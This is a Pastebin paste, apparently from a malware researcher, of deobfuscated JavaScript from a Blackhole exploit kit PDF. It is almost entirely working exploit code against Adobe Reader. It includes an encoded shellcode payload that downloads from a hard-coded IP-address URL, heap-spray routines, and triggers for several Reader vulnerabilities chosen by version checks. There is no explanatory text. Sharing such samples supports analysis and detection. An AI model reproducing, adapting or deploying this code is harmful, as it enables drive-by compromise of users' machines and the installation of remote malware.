Advertisement
unixfreaxjp

Blackhole Dropped PDF exploit CVE-2009-0927 deobfuscated

Sep 5th, 2012
112
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -------------------eval()---------------------
  2. bjsg = '
  3. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30
  4. %u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374
  5. %u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb
  6. %u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835
  7. %uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
  8. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f
  9. %u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24
  10. %ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b
  11. %u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905
  12. %u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
  13. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05
  14. %u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08
  15. %ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d
  16. %u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732
  17. %u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
  18. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64
  19. %uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51
  20. %u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53
  21. %u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb
  22. %u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
  23. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01
  24. %uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a
  25. %u382f%u2e35%u3731%u352e%u2e38%u3231%u2f33%u2e77%u6870
  26. %u3f70%u3d66%u3739%u3164%u2639%u3d65%u0033%u0000';
  27. function ezvr(ra, qy){
  28. while (ra.length * 2 < qy){
  29. ra += ra;
  30. }
  31. ra = ra.substring(0, qy / 2);
  32. return ra;
  33. }
  34. function bx(){
  35. var dkg = new Array();
  36. var vw = 0x0c0c0c0c;
  37. var addr = 0x400000;
  38. var payload = unescape(bjsg);
  39. var sc_len = payload.length * 2;
  40. var qy = addr - (sc_len + 0x38);
  41. var yarsp = unescape("%u9090%u9090");
  42. yarsp = ezvr(yarsp, qy);
  43. var count2 = (vw - 0x400000) / addr;
  44. for (var count = 0; count < count2; count ++ ){
  45. dkg[count] = yarsp + payload;
  46. }
  47. var overflow = unescape("%u0c0c%u0c0c");
  48. while (overflow.length < 44952){
  49. overflow += overflow;
  50. }
  51. this .collabStore = Collab.collectEmailInfo({
  52. subj : "", msg : overflow
  53. }
  54. );
  55. }
  56. function printf(){
  57. nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  58. var payload = unescape(bjsg);
  59. heapblock = nop + payload;
  60. bigblock = unescape("%u0A0A%u0A0A");
  61. headersize = 20;
  62. spray = headersize + heapblock.length;
  63. while (bigblock.length < spray){
  64. bigblock += bigblock;
  65. }
  66. fillblock = bigblock.substring(0, spray);
  67. block = bigblock.substring(0, bigblock.length - spray);
  68. while (block.length + spray < 0x40000){
  69. block = block + block + fillblock;
  70. }
  71. mem = new Array();
  72. for (i = 0; i < 1400; i ++ ){
  73. mem[i] = block + heapblock;
  74. }
  75. var num =
  76. 129999999999999999998888888888888888888888888888888888888888888
  77. 888888888888888888888888888888888888888888888888888888888888888
  78. 888888888888888888888888888888888888888888888888888888888888888
  79. 888888888888888888888888888888888888888888888888888888888888888
  80. 88888888888888888888888888888888888888888888;
  81. util.printf("%45000f", num);
  82. }
  83. function geticon(){
  84. var arry = new Array();
  85. if (app.doc.Collab.getIcon){
  86. var payload = unescape(bjsg);
  87. var hWq500CN = payload.length * 2;
  88. var qy = 0x400000 - (hWq500CN + 0x38);
  89. var yarsp = unescape("%u9090%u9090");
  90. yarsp = ezvr(yarsp, qy);
  91. var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  92. for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  93. arry[vqcQD96y] = yarsp + payload;
  94. }
  95. var tUMhNbGw = unescape("%09");
  96. while (tUMhNbGw.length < 0x4000){
  97. tUMhNbGw += tUMhNbGw;
  98. }
  99. tUMhNbGw = "N." + tUMhNbGw;
  100. app.doc.Collab.getIcon(tUMhNbGw);
  101. }
  102. }
  103. aPlugins = app.plugIns;
  104. var sv = parseInt(app.viewerVersion.toString().charAt(0));
  105. for (var i = 0; i < aPlugins.length; i ++ ){
  106. if (aPlugins[i].name == 'EScript'){
  107. var lv = aPlugins[i].version;
  108. }
  109. }
  110. if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
  111. geticon();
  112. }
  113. else if (lv == 7.1){
  114. printf();
  115. }
  116. else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
  117. bx();
  118. }
  119. else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
  120. function a(){
  121. util.printd('p@111111111111111111111111 : yyyy111', new Date());
  122. }
  123. var h = app.plugIns;
  124. for (var f = 0; f < h.length; f ++ ){
  125. if (h[f].name == 'EScript'){
  126. var i = h[f].version;
  127. }
  128. }
  129. if ((i > 8.12) && (i < 8.2)){
  130. c = new Array();
  131. var d = unescape('%u9090%u9090');
  132. var e = unescape(bjsg);
  133. while (d.length <= 0x8000){
  134. d += d;
  135. }
  136. d = d.substr(0, 0x8000 - e.length);
  137. for (f = 0; f < 2900; f ++ ){
  138. c[f] = d + e;
  139. }
  140. a();
  141. a();
  142. try {
  143. this .media.newPlayer(null);
  144. }
  145. catch (e){
  146. }
  147. a();
  148. }
  149. }
  150. -------------end eval----------------
Advertisement
RAW Paste Data Copied
Advertisement